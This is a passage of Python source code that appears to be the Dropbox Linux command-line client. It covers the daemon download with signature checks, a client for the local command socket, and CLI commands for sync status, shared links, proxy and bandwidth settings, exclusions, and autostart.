self.hbox.pack_start(self.box_logo, False, False, 0)
self.hbox.pack_start(self.label_box, False, False, 0)
self.hbox.pack_start(self.progress, False, False, 0)
self.hbox.show()
self.vbox.add(self.hbox)
self.dont_show_again_align = None
try:
if can_reroll_autostart():
dont_show_again = Gtk.CheckButton.new_with_mnemonic("_Don't show this again")
dont_show_again.connect('toggled', self.handle_dont_show_toggle)
dont_show_again.show()
self.dont_show_again_align = Gtk.Alignment(xalign=1.0, yalign=0.0, xscale=0.0, yscale=0.0)
self.dont_show_again_align.add(dont_show_again)
self.dont_show_again_align.show()
hbox = Gtk.HBox()
hbox.set_property('border-width', 10)
hbox.pack_start(self.dont_show_again_align, True, True, 0)
hbox.show()
self.vbox.add(hbox)
self.set_resizable(False)
except:
traceback.print_exc()
self.ok.grab_focus()
dialog = DownloadDialog()
dialog.show()
Gtk.main()
if dialog.user_cancelled:
raise Exception("user cancelled download!!!")
else:
def download():
global FatalVisibleError
def FatalVisibleError(s):
console_print("\nError: %s" % s, f=sys.stderr)
sys.exit(-1)
ESC = "\x1b"
save = ESC+"7"
unsave = ESC+"8"
erase_to_start = ESC+"[1K"
write = sys.stdout.write
flush = sys.stdout.flush
last_progress = [None, None]
def setprogress(text, frac):
if last_progress == [text, frac]:
return
if sys.stdout.isatty():
write(erase_to_start)
write(unsave)
console_print(text % int(100*frac), linebreak=not sys.stdout.isatty())
if sys.stdout.isatty():
flush()
last_progress[0], last_progress[1] = text, frac
console_print()
if sys.stdout.isatty():
write(save)
flush()
console_print("%s %s\n" % (INFO, LINK))
GPG_WARNING_MSG = ("\n%s" % GPG_WARNING) if not gpg and not gpgme else ""
if not yes_no_question("%s%s" % (WARNING, GPG_WARNING_MSG)):
return
download = DownloadState()
try:
for progress, status in download.copy_data():
if not status:
break
setprogress(DOWNLOADING, progress)
except Exception:
traceback.print_exc()
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(DOWNLOADING, 1.0)
console_print()
write(save)
try:
for _, i, total in download.unpack():
setprogress(UNPACKING, float(i)/total)
except SignatureVerifyError:
traceback.print_exc()
FatalVisibleError(ERROR_SIGNATURE)
except Exception:
traceback.print_exc()
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(UNPACKING, 1.0)
if not download.is_dropbox_valid():
FatalVisibleError(ERROR_INVALID_DROPBOX)
console_print()
class CommandTicker(threading.Thread):
    """Background thread that animates a small ``[...]`` spinner on stderr
    while a potentially slow daemon command is in flight.

    The first full cycle is silent so fast commands never flash a spinner;
    call stop() (and join()) to end the animation.
    """
    def __init__(self):
        threading.Thread.__init__(self)
        self.stop_event = threading.Event()

    def stop(self):
        """Signal run() to exit at its next quarter-second tick."""
        self.stop_event.set()

    def run(self):
        # Constant-width frames so each write fully overdraws the previous.
        ticks = ['[.  ]', '[.. ]', '[...]', '[ ..]', '[  .]', '[   ]']
        i = 0
        first = True
        while True:
            self.stop_event.wait(0.25)
            # is_set() replaces isSet(), an alias deprecated since Python 3.10.
            if self.stop_event.is_set():
                break
            if i == len(ticks):
                # One complete silent cycle has elapsed; start drawing.
                first = False
                i = 0
            if not first:
                sys.stderr.write("\r%s\r" % ticks[i])
                sys.stderr.flush()
            i += 1
        sys.stderr.flush()
class DropboxCommand(object):
    """Client for the dropboxd command socket (~/.dropbox/command_socket).

    Commands are invoked as attribute calls (see __getattr__), e.g.
    ``dc.get_dropbox_status(...)`` sends ``get_dropbox_status`` over the
    wire with its keyword arguments and returns the parsed reply.
    """
    class CouldntConnectError(Exception): pass
    class BadConnectionError(Exception): pass
    class EOFError(Exception): pass
    class CommandError(Exception): pass

    def __init__(self, timeout=5):
        # Unix-domain stream socket to the locally running daemon.
        self.s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.s.settimeout(timeout)
        try:
            self.s.connect(os.path.expanduser('~/.dropbox/command_socket'))
        except socket.error:
            raise DropboxCommand.CouldntConnectError()
        # Buffered text-mode file wrapper used for the line protocol.
        self.f = self.s.makefile("rw", 4096)

    def close(self):
        self.f.close()
        self.s.close()

    def __readline(self):
        # Read one protocol line; '' means the daemon closed the socket.
        try:
            toret = self.f.readline().rstrip("\n")
        except socket.error:
            raise DropboxCommand.BadConnectionError()
        if toret == '':
            raise DropboxCommand.EOFError()
        else:
            return toret

    # atttribute doesn't exist, i know what you want
    def send_command(self, name, args):
        # Wire format: command name, then one "key\tvalue[\tvalue...]" line
        # per argument (a str value is a single field, any other iterable
        # contributes one field per element), terminated by "done".
        self.f.write(name)
        self.f.write("\n")
        self.f.writelines(("\t".join([k] + ([v]
                                            if isinstance(v, str) else
                                            list(v))) + "\n")
                          for k,v in args.items())
        self.f.write("done\n")
        self.f.flush()

        # Start a ticker
        ticker_thread = CommandTicker()
        ticker_thread.start()

        # This is the potentially long-running call.
        try:
            ok = self.__readline() == "ok"
        except KeyboardInterrupt:
            raise DropboxCommand.BadConnectionError("Keyboard interruption detected")
        finally:
            # Tell the ticker to stop.
            ticker_thread.stop()
            ticker_thread.join()

        if ok:
            # Success reply: up to 20 "key\tvalue..." lines, then "done".
            # More than that means the stream is out of sync — bail.
            toret = {}
            for i in range(21):
                if i == 20:
                    raise Exception("close this connection!")
                line = self.__readline()
                if line == "done":
                    break
                argval = line.split("\t")
                toret[argval[0]] = argval[1:]
            return toret
        else:
            # Error reply: free-form problem lines until "done".
            problems = []
            for i in range(21):
                if i == 20:
                    raise Exception("close this connection!")
                line = self.__readline()
                if line == "done":
                    break
                problems.append(line)
            raise DropboxCommand.CommandError("\n".join(problems))

    # this is the hotness, auto marshalling
    def __getattr__(self, name):
        # Any unknown attribute becomes a callable that sends the
        # same-named command; it is cached on the instance so subsequent
        # lookups skip __getattr__.
        try:
            return super(DropboxCommand, self).__getattr__(name)
        except:
            def __spec_command(**kw):
                return self.send_command(str(name), kw)
            self.__setattr__(name, __spec_command)
            return __spec_command
# Registry of CLI commands (name -> function), populated by @command.
commands = {}
# Alternate command names (alias -> function), populated by @alias.
aliases = {}
def command(meth):
    """Decorator: register *meth* in the global command table.

    The docstring is mandatory because it doubles as the command's help
    text; any aliases registered for this name are appended to it.
    """
    global commands, aliases
    assert meth.__doc__, "All commands need properly formatted docstrings (even %r!!)" % meth
    # Unwrap a bound method, should we ever register one.
    meth = getattr(meth, 'im_func', meth)
    commands[meth.__name__] = meth
    names = [str(a) for a, target in aliases.items()
             if target.__name__ == meth.__name__]
    if names:
        meth.__doc__ += "\nAliases: %s" % ",".join(names)
    return meth
def alias(name):
    """Decorator factory: register *name* as an alias for the decorated
    command function."""
    def register(meth):
        global commands, aliases
        assert name not in commands, "This alias is the name of a command."
        aliases[name] = meth
        return meth
    return register
def requires_dropbox_running(meth):
    """Decorator: only invoke *meth* when the daemon is up; otherwise
    print a notice and return None."""
    def newmeth(*n, **kw):
        if not is_dropbox_running():
            console_print("Dropbox isn't running!")
            return None
        return meth(*n, **kw)
    # Preserve identity by hand (this predates functools.wraps usage here).
    newmeth.__name__ = meth.__name__
    newmeth.__doc__ = meth.__doc__
    return newmeth
def start_dropbox():
    """Launch the dropboxd daemon and poll for up to a minute until it
    reports as running.

    Returns True on success, False when the binary is missing/not
    executable or the daemon never comes up.
    """
    if not os.access(DROPBOXD_PATH, os.X_OK):
        return False

    # Fix indicator icon and menu on Unity environments. (LP: #1559249)
    # Fix indicator icon and menu in Budgie environment. (LP: #1683051)
    new_env = os.environ.copy()
    current_env = os.environ.get("XDG_CURRENT_DESKTOP", '').split(":")
    to_check = ['Unity', 'Budgie']
    if any(word in to_check for word in current_env):
        new_env['XDG_CURRENT_DESKTOP'] = 'Unity'

    # we don't reap the child because we're gonna die anyway, let init do it.
    # subprocess.DEVNULL replaces the old open("/dev/null", "w") file
    # object, which was never closed (fd leak in this process).
    subprocess.Popen([DROPBOXD_PATH], preexec_fn=os.setsid,
                     cwd=os.path.expanduser("~"),
                     stderr=sys.stderr, stdout=subprocess.DEVNULL,
                     close_fds=True, env=new_env)

    # in seconds
    interval = 0.5
    wait_for = 60
    for _ in range(int(wait_for / interval)):
        if is_dropbox_running():
            return True
        # back off from connect for a while
        time.sleep(interval)
    return False
# Extracted and modified from os.cmd.Cmd
def columnize(list, display_list=None, display_width=None):
    # Print *list* in ls-style columns fitted to display_width (queried
    # from `stty size` when not given).  display_list, when provided,
    # holds formatted (e.g. ANSI-colored) twins of the entries in *list*;
    # column widths are computed from the plain strings and the formatted
    # versions are substituted just before printing.
    if not list:
        console_print("<empty>")
        return

    non_str = [i for i in range(len(list)) if not (isinstance(list[i], str))]
    if non_str:
        raise TypeError("list[i] not a string for i in %s" %
                        ", ".join(map(str, non_str)))

    if not display_width:
        # Ask the terminal for its size; if that fails (not a tty), fall
        # back to one entry per line.
        d = os.popen('stty size', 'r').read().split()
        if d:
            display_width = int(d[1])
        else:
            for item in list:
                console_print(item)
            return

    if not display_list:
        display_list = list

    size = len(list)
    if size == 1:
        console_print(display_list[0])
        return

    # Find the smallest row count whose column layout fits display_width.
    # Entries are laid out column-major: element i lands at
    # (row = i % nrows, col = i // nrows).
    for nrows in range(1, len(list)):
        ncols = (size+nrows-1) // nrows
        colwidths = []
        totwidth = -2
        for col in range(ncols):
            colwidth = 0
            for row in range(nrows):
                i = row + nrows*col
                if i >= size:
                    break
                x = list[i]
                colwidth = max(colwidth, len(x))
            colwidths.append(colwidth)
            totwidth += colwidth + 2
            if totwidth > display_width:
                break
        if totwidth <= display_width:
            break
    else:
        # Nothing fit: degrade to a single column.
        nrows = len(list)
        ncols = 1
        colwidths = [0]

    lines = []
    for row in range(nrows):
        texts = []
        display_texts = []
        for col in range(ncols):
            i = row + nrows*col
            if i >= size:
                x = ""
                y = ""
            else:
                x = list[i]
                y = display_list[i]
            texts.append(x)
            display_texts.append(y)
        # Drop empty trailing cells so the row has no dangling padding.
        while texts and not texts[-1]:
            del texts[-1]
        original_texts = texts[:]
        for col in range(len(texts)):
            # Pad using the plain text's width, then swap in the formatted
            # (possibly colored) version so padding isn't skewed by escape
            # sequences.
            texts[col] = texts[col].ljust(colwidths[col])
            texts[col] = texts[col].replace(original_texts[col], display_texts[col])
        line = "  ".join(texts)
        lines.append(line)
    for line in lines:
        console_print(line)
@command
def update(args):
    """download latest version of Dropbox
    dropbox update
    Downloads the latest version of Dropbox. This should not be required
    normally, as Dropbox automatically updates itself.
    """
    # Delegates to whichever download() (GTK or console) was defined at
    # import time based on GUI_AVAILABLE.
    download()
@command
@requires_dropbox_running
@alias('stat')
def filestatus(args):
    """get current sync status of one or more files
    dropbox filestatus [-l] [-a] [FILE]...
    Prints the current status of each FILE.
    options:
    -l --list Prints out information in a format similar to ls. Works best when your console supports color :)
    -a --all Do not ignore entries starting with "."
    """
    global enc

    oparser = optparse.OptionParser()
    oparser.add_option("-l", "--list", action="store_true", dest="list")
    oparser.add_option("-a", "--all", action="store_true", dest="all")
    (options, args) = oparser.parse_args(args)

    try:
        with closing(DropboxCommand()) as dc:
            if options.list:
                # Listing.
                # Separate directories from files.
                if len(args) == 0:
                    dirs, nondirs = ["."], []
                else:
                    dirs, nondirs = [], []
                    for a in args:
                        try:
                            (dirs if os.path.isdir(a) else nondirs).append(a)
                        except UnicodeDecodeError:
                            continue
                    if len(dirs) == 0 and len(nondirs) == 0:
                        #TODO: why?
                        exit(1)
                dirs.sort(key=methodcaller('lower'))
                nondirs.sort(key=methodcaller('lower'))

                # Gets a string representation for a path.
                # Returns (plain, formatted): same width, but the second
                # may carry ANSI color based on the daemon-reported status.
                def path_to_string(file_path):
                    if not os.path.exists(file_path):
                        path = "%s (File doesn't exist!)" % os.path.basename(file_path)
                        return (path, path)
                    try:
                        status = dc.icon_overlay_file_status(path=file_path).get('status', [None])[0]
                    except DropboxCommand.CommandError as e:
                        path = "%s (%s)" % (os.path.basename(file_path), e)
                        return (path, path)

                    env_term = os.environ.get('TERM','')
                    supports_color = (sys.stderr.isatty() and (
                                        env_term.startswith('vt') or
                                        env_term.startswith('linux') or
                                        'xterm' in env_term or
                                        'color' in env_term
                                        )
                                     )

                    # TODO: Test when you don't support color.
                    if not supports_color:
                        path = os.path.basename(file_path)
                        return (path, path)

                    # Map daemon status -> ANSI color escape pair.
                    if status == "up to date":
                        init, cleanup = "\x1b[32;1m", "\x1b[0m"
                    elif status == "syncing":
                        init, cleanup = "\x1b[36;1m", "\x1b[0m"
                    elif status == "unsyncable":
                        init, cleanup = "\x1b[41;1m", "\x1b[0m"
                    elif status == "selsync":
                        # Excluded by selective sync.
                        init, cleanup = "\x1b[37;1m", "\x1b[0m"
                    else:
                        init, cleanup = '', ''

                    path = os.path.basename(file_path)
                    return (path, "%s%s%s" % (init, path, cleanup))

                # Prints a directory.
                def print_directory(name):
                    clean_paths = []
                    formatted_paths = []
                    for subname in sorted(os.listdir(name), key=methodcaller('lower')):
                        if type(subname) != str:
                            continue
                        # Skip hidden entries unless -a/--all was given.
                        if not options.all and subname[0] == '.':
                            continue
                        try:
                            clean, formatted = path_to_string(os.path.abspath(os.path.join(name, subname)))
                            clean_paths.append(clean)
                            formatted_paths.append(formatted)
                        except (UnicodeEncodeError, UnicodeDecodeError):
                            continue
                    columnize(clean_paths, formatted_paths)

                try:
                    if len(dirs) == 1 and len(nondirs) == 0:
                        print_directory(dirs[0])
                    else:
                        # Plain files first, then each directory with a
                        # "name:" header (ls-style).
                        nondir_formatted_paths = []
                        nondir_clean_paths = []
                        for name in nondirs:
                            try:
                                clean, formatted = path_to_string(os.path.abspath(name))
                                nondir_clean_paths.append(clean)
                                nondir_formatted_paths.append(formatted)
                            except (UnicodeEncodeError, UnicodeDecodeError):
                                continue

                        if nondir_clean_paths:
                            columnize(nondir_clean_paths, nondir_formatted_paths)

                        if len(nondirs) == 0:
                            console_print(dirs[0] + ":")
                            print_directory(dirs[0])
                            dirs = dirs[1:]

                        for name in dirs:
                            console_print()
                            console_print(name + ":")
                            print_directory(name)

                except DropboxCommand.EOFError:
                    console_print("Dropbox daemon stopped.")
                except DropboxCommand.BadConnectionError:
                    console_print("Dropbox isn't responding!")
            else:
                # Non-list mode: one "name: status" line per argument.
                if len(args) == 0:
                    args = [name for name in sorted(os.listdir("."), key=methodcaller('lower')) if type(name) == str]
                if len(args) == 0:
                    # Bail early if there's nothing to list to avoid crashing on indent below
                    console_print("<empty>")
                    return
                indent = max(len(st)+1 for st in args)
                for file in args:
                    try:
                        if type(file) is not str:
                            file = file.decode(enc)
                        fp = os.path.abspath(file)
                    except (UnicodeEncodeError, UnicodeDecodeError):
                        continue
                    if not os.path.exists(fp):
                        console_print("%-*s %s" % \
                            (indent, file+':', "File doesn't exist"))
                        continue

                    try:
                        status = dc.icon_overlay_file_status(path=fp).get('status', ['unknown'])[0]
                        console_print("%-*s %s" % (indent, file+':', status))
                    except DropboxCommand.CommandError as e:
                        console_print("%-*s %s" % (indent, file+':', e))
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def ls(args):
    """list directory contents with current sync status
    dropbox ls [FILE]...
    This is an alias for filestatus -l
    """
    # Prepend the -l flag and let filestatus do the work.
    return filestatus(["-l", *args])
@command
@requires_dropbox_running
def puburl(args):
    """get public url of a file in your Dropbox's public folder
    dropbox puburl FILE
    Prints out a public url for FILE (which must be in your public folder).
    """
    # Exactly one path argument is required; otherwise show usage.
    if len(args) != 1:
        console_print(puburl.__doc__, linebreak=False)
        return
    try:
        with closing(DropboxCommand()) as daemon:
            try:
                reply = daemon.get_public_link(path=os.path.abspath(args[0]))
                console_print(reply.get('link', ['No Link'])[0])
            except DropboxCommand.CommandError as e:
                console_print("Couldn't get public url: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def sharelink(args):
    """get a shared link for a file in your Dropbox
    dropbox sharelink FILE
    Prints out a shared link for FILE.
    """
    # A single path argument is mandatory.
    if len(args) != 1:
        console_print(sharelink.__doc__, linebreak=False)
        return
    try:
        with closing(DropboxCommand()) as daemon:
            try:
                target = os.path.abspath(args[0])
                console_print(daemon.get_shared_link(path=target).get('link', ['No link'])[0])
            except DropboxCommand.CommandError as e:
                console_print("Couldn't get shared link: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def proxy(args):
    """set proxy settings for Dropbox
    dropbox proxy MODE [TYPE] [HOST] [PORT] [USERNAME] [PASSWORD]
    Set proxy settings for Dropbox.
    MODE - one of "none", "auto", "manual"
    TYPE - one of "http", "socks4", "socks5" (only valid with "manual" mode)
    HOST - proxy hostname (only valid with "manual" mode)
    PORT - proxy port (only valid with "manual" mode)
    USERNAME - (optional) proxy username (only valid with "manual" mode)
    PASSWORD - (optional) proxy password (only valid with "manual" mode)
    """
    mode = args[0].lower() if len(args) >= 1 else None
    type_ = args[1].lower() if len(args) >= 2 else None

    # Validate the argument shape: "manual" needs a type plus host/port
    # (and optionally username/password); other modes take no extras.
    usage_error = (
        len(args) == 0 or
        mode not in ('none', 'auto', 'manual') or
        (mode == 'manual' and len(args) not in (4, 6)) or
        (mode != 'manual' and len(args) != 1) or
        (mode == 'manual' and type_ not in ('http', 'socks4', 'socks5'))
    )
    if usage_error:
        # Print help
        console_print(proxy.__doc__, linebreak=False)
        return

    # Load the args into a dictionary, then re-set mode/type because the
    # originals were coerced to lower case above.
    kwargs = dict(zip(('mode', 'type', 'host', 'port', 'username', 'password'), args))
    kwargs['mode'] = mode
    if type_:
        kwargs['type'] = type_

    try:
        with closing(DropboxCommand()) as daemon:
            try:
                daemon.set_proxy_settings(**kwargs)
                console_print('set')
            except DropboxCommand.CommandError as e:
                console_print("Couldn't set proxy: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def throttle(args):
    """set bandwidth limits for Dropbox
    dropbox throttle DOWNLOAD UPLOAD
    Set bandwidth limits for file sync.
    DOWNLOAD - either "unlimited" or a manual limit in KB/s
    UPLOAD - one of "unlimited", "auto", or a manual limit in KB/s
    """
    # Exactly two positional arguments: download limit, then upload limit.
    if len(args) != 2:
        console_print(throttle.__doc__, linebreak=False)
        return

    def parse_limit(raw, keywords):
        # Returns (mode, numeric_limit_or_None), or None when unparsable.
        if raw in keywords:
            return raw, None
        try:
            return 'manual', int(raw)
        except ValueError:
            return None

    parsed = parse_limit(args[0].lower(), ('unlimited',))
    if parsed is None:
        console_print(throttle.__doc__, linebreak=False)
        return
    download_mode, download_limit = parsed

    parsed = parse_limit(args[1].lower(), ('unlimited', 'auto'))
    if parsed is None:
        console_print(throttle.__doc__, linebreak=False)
        return
    upload_mode, upload_limit = parsed

    kwargs = {
        'download_mode': download_mode,
        'upload_mode': upload_mode,
    }
    if download_limit:
        kwargs['download_limit'] = str(download_limit)
    if upload_limit:
        kwargs['upload_limit'] = str(upload_limit)

    try:
        with closing(DropboxCommand()) as daemon:
            try:
                daemon.set_bandwidth_limits(**kwargs)
                console_print('set')
            except DropboxCommand.CommandError as e:
                console_print("Couldn't set bandwidth limits: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def status(args):
    """get current status of the dropboxd
    dropbox status
    Prints out the current status of the Dropbox daemon.
    """
    # This command takes no arguments.
    if args:
        console_print(status.__doc__, linebreak=False)
        return
    try:
        with closing(DropboxCommand()) as daemon:
            try:
                lines = daemon.get_dropbox_status()['status']
                if not lines:
                    console_print('Idle')
                else:
                    for line in lines:
                        console_print(line)
                # Remind the user to link this machine when needed.
                grab_link_url_if_necessary()
            except KeyError:
                console_print("Couldn't get status: daemon isn't responding")
            except DropboxCommand.CommandError as e:
                console_print("Couldn't get status: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
def running(argv):
    """return whether Dropbox is running
    dropbox running
    Returns 1 if running, and 0 if not running.
    """
    # The int result becomes the process exit status (see __main__).
    return 1 if is_dropbox_running() else 0
@command
@requires_dropbox_running
def stop(args):
    """stop dropboxd
    dropbox stop
    Stops the Dropbox daemon.
    """
    # Ask the daemon for an immediate exit; connection problems are
    # reported rather than raised.
    try:
        with closing(DropboxCommand()) as daemon:
            try:
                daemon.tray_action_hard_exit()
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
#returns true if link is necessary
def grab_link_url_if_necessary():
    # Ask the daemon whether this machine still needs to be linked to an
    # account; print the link URL when so.  Returns True/False, or None
    # when the daemon couldn't be queried.
    try:
        with closing(DropboxCommand()) as daemon:
            try:
                link_url = daemon.needs_link().get("link_url", None)
                if link_url is None:
                    return False
                console_print("To link this computer to a Dropbox account, visit the following url:\n%s" % link_url[0])
                return True
            except DropboxCommand.CommandError:
                pass
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
@command
@requires_dropbox_running
def lansync(argv):
    """enables or disables LAN sync
    dropbox lansync [y/n]
    options:
    y Dropbox will use LAN sync (default)
    n Dropbox will not use LAN sync
    """
    if len(argv) != 1:
        console_print(lansync.__doc__, linebreak=False)
        return
    s = argv[0].lower()
    if s.startswith('y') or s.startswith('-y'):
        should_lansync = True
    elif s.startswith('n') or s.startswith('-n'):
        should_lansync = False
    else:
        should_lansync = None
    if should_lansync is None:
        console_print(lansync.__doc__, linebreak=False)
        return
    # Wrap the daemon call like every other command does; previously a
    # dead/stopped daemon here raised an unhandled exception instead of
    # printing a friendly message.
    try:
        with closing(DropboxCommand()) as dc:
            try:
                dc.set_lan_sync(lansync='enabled' if should_lansync else 'disabled')
            except DropboxCommand.CommandError as e:
                console_print("Couldn't set LAN sync: " + str(e))
            except DropboxCommand.BadConnectionError:
                console_print("Dropbox isn't responding!")
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")
def _print_excluded(banner, paths):
    # Print *banner* followed by each path relative to the CWD.
    console_print(banner)
    for line in [relpath(path) for path in paths]:
        console_print(str(line))

def _exclude_modify(method_name, result_key, banner, verb, absolute_paths):
    """Shared implementation of `exclude add` / `exclude remove`.

    method_name - daemon command to invoke (ignore_set_add/ignore_set_remove)
    result_key  - key of the affected-path list in the daemon's reply
    banner      - header line printed before the affected paths
    verb        - "add" or "remove", used in the not-responding message
    """
    try:
        # No timeout: resynchronization can legitimately take a while.
        with closing(DropboxCommand(timeout=None)) as dc:
            try:
                result = getattr(dc, method_name)(paths=absolute_paths)
                if result[result_key]:
                    _print_excluded(banner, result[result_key])
            except KeyError:
                console_print("Couldn't %s ignore path: daemon isn't responding" % verb)
            except DropboxCommand.CommandError as e:
                if e.args[0].startswith("No command exists by that name"):
                    console_print("This version of the client does not support this command.")
                else:
                    console_print("Couldn't get ignore set: " + str(e))
            except DropboxCommand.BadConnectionError as e:
                console_print("Dropbox isn't responding! [%s]" % e)
            except DropboxCommand.EOFError:
                console_print("Dropbox daemon stopped.")
    except DropboxCommand.CouldntConnectError:
        console_print("Dropbox isn't running!")

@command
@requires_dropbox_running
def exclude(args):
    """ignores/excludes a directory from syncing
    dropbox exclude [list]
    dropbox exclude add [DIRECTORY] [DIRECTORY] ...
    dropbox exclude remove [DIRECTORY] [DIRECTORY] ...
    "list" prints a list of directories currently excluded from syncing.
    "add" adds one or more directories to the exclusion list, then
    resynchronizes Dropbox.
    "remove" removes one or more directories from the exclusion list, then
    resynchronizes Dropbox.
    With no arguments, executes "list".
    Any specified path must be within Dropbox.
    """
    if len(args) == 0:
        # "list" (default): show the current ignore set.
        try:
            with closing(DropboxCommand()) as dc:
                try:
                    lines = [relpath(path) for path in dc.get_ignore_set()['ignore_set']]
                    lines.sort()
                    if len(lines) == 0:
                        console_print('No directories are being ignored.')
                    else:
                        console_print('Excluded: ')
                        for line in lines:
                            console_print(str(line))
                except KeyError:
                    console_print("Couldn't get ignore set: daemon isn't responding")
                except DropboxCommand.CommandError as e:
                    if e.args[0].startswith("No command exists by that name"):
                        console_print("This version of the client does not support this command.")
                    else:
                        console_print("Couldn't get ignore set: " + str(e))
                except DropboxCommand.BadConnectionError:
                    console_print("Dropbox isn't responding!")
                except DropboxCommand.EOFError:
                    console_print("Dropbox daemon stopped.")
        except DropboxCommand.CouldntConnectError:
            console_print("Dropbox isn't running!")
    elif len(args) == 1 and args[0] == "list":
        exclude([])
    elif len(args) >= 2:
        sub_command = args[0]
        absolute_paths = [os.path.abspath(path) for path in args[1:]]
        # add/remove share all plumbing except the daemon method, reply
        # key and user-facing strings (see _exclude_modify).
        if sub_command == "add":
            _exclude_modify("ignore_set_add", "ignored",
                            "Excluded: ", "add", absolute_paths)
        elif sub_command == "remove":
            _exclude_modify("ignore_set_remove", "removed",
                            "No longer excluded: ", "remove", absolute_paths)
        else:
            console_print(exclude.__doc__, linebreak=False)
            return
    else:
        console_print(exclude.__doc__, linebreak=False)
        return
@command
def start(argv):
    """start dropboxd
    dropbox start [-i]
    Starts the Dropbox daemon, dropboxd. If dropboxd is already running,
    this will do nothing.
    options:
    -i --install auto install dropboxd if not available on the system
    """
    should_install = "-i" in argv or "--install" in argv

    # first check if dropbox is already running
    if is_dropbox_running():
        if not grab_link_url_if_necessary():
            console_print("Dropbox is already running!")
        return

    console_print("Starting Dropbox...", linebreak=False)
    console_flush()

    if start_dropbox():
        # Daemon binary was present and came up on the first attempt.
        if not grab_link_url_if_necessary():
            console_print("Done!")
        return

    if not should_install:
        console_print()
        console_print("The Dropbox daemon is not installed!")
        console_print("Run \"dropbox start -i\" to install the daemon")
        return

    # install dropbox!!!
    try:
        download()
    except:
        traceback.print_exc()
    else:
        if GUI_AVAILABLE:
            start_dropbox()
            console_print("Done!")
        else:
            if start_dropbox():
                if not grab_link_url_if_necessary():
                    console_print("Done!")
def can_reroll_autostart():
    """Return whether the home directory has a ``.config`` entry, i.e. an
    XDG-style desktop where the autostart link can be managed."""
    home_entries = os.listdir(os.path.expanduser('~'))
    return ".config" in home_entries
def reroll_autostart(should_autostart):
    """Create or remove the XDG autostart .desktop link for Dropbox.

    No-op on homes without a ``.config`` directory entry.
    """
    home_dir = os.path.expanduser('~')
    # UBUNTU
    if ".config" not in os.listdir(home_dir):
        return
    autostart_dir = os.path.join(home_dir, ".config", "autostart")
    autostart_link = os.path.join(autostart_dir, "dropbox.desktop")
    if should_autostart:
        # Copy the shipped .desktop file into the autostart directory.
        if os.path.exists(DESKTOP_FILE):
            if not os.path.exists(autostart_dir):
                os.makedirs(autostart_dir)
            shutil.copyfile(DESKTOP_FILE, autostart_link)
    elif os.path.exists(autostart_link):
        os.remove(autostart_link)
@command
def autostart(argv):
    """automatically start Dropbox at login
    dropbox autostart [y/n]
    options:
    n Dropbox will not start automatically at login
    y Dropbox will start automatically at login (default)
    Note: May only work on current Ubuntu distributions.
    """
    if len(argv) != 1:
        # Print the doc minus its first (summary) line.
        console_print(''.join(autostart.__doc__.split('\n', 1)[1:]))
        return
    choice = argv[0].lower()
    if choice.startswith(('y', '-y')):
        reroll_autostart(True)
    elif choice.startswith(('n', '-n')):
        reroll_autostart(False)
    else:
        console_print(autostart.__doc__, linebreak=False)
@command
def version(argv):
    """print version information for Dropbox
    dropbox version
    Prints the version information for the Dropbox proprietary daemon, if
    it's installed, and the Dropbox command-line interface.
    """
    daemon_version = "Not installed"
    try:
        with open(os.path.join(DROPBOX_DIST_PATH, 'VERSION')) as f:
            daemon_version = f.read().strip()
    except OSError:
        # No VERSION file -> daemon not installed; keep the default text.
        pass
    console_print("Dropbox daemon version: %s" % daemon_version)
    console_print("Dropbox command-line interface version: 2020.03.04")
@command
def help(argv):
    """provide help
    dropbox help [COMMAND]
    With no arguments, print a list of commands and a short description of
    each. With a command, print descriptive help on how to use the
    command.
    """
    if not argv:
        return usage()
    wanted = argv[0]
    # Print the docstring minus its first (summary) line.
    if wanted in commands:
        console_print(commands[wanted].__doc__.split('\n', 1)[1].strip())
        return
    if wanted in aliases:
        console_print(aliases[wanted].__doc__.split('\n', 1)[1].strip())
        return
    console_print("unknown command '%s'" % wanted, f=sys.stderr)
def usage():
    """Print the top-level help: one summary line per registered command."""
    console_print("Dropbox command-line interface\n")
    console_print("commands:\n")
    console_print("Note: use dropbox help <command> to view usage for a specific command.\n")
    # (name, first docstring line) pairs, sorted by command name.
    entries = sorted((name, fn.__doc__.splitlines()[0])
                     for name, fn in commands.items())
    spacing = max(len(name) + 3 for name, _ in entries)
    for name, summary in entries:
        console_print(" %-*s%s" % (spacing, name, summary))
def main(argv):
    """Dispatch the command line in *argv* to the matching command handler.

    Scans argv for the first token that names a known command or alias;
    everything before it is treated as global options, everything after it
    as that command's arguments.  Returns the command's result (used as the
    process exit status by the caller), or exits directly when no command
    is found.
    """
    global commands
    # Find the first argv element that is a command or alias; argv is split
    # at that point.
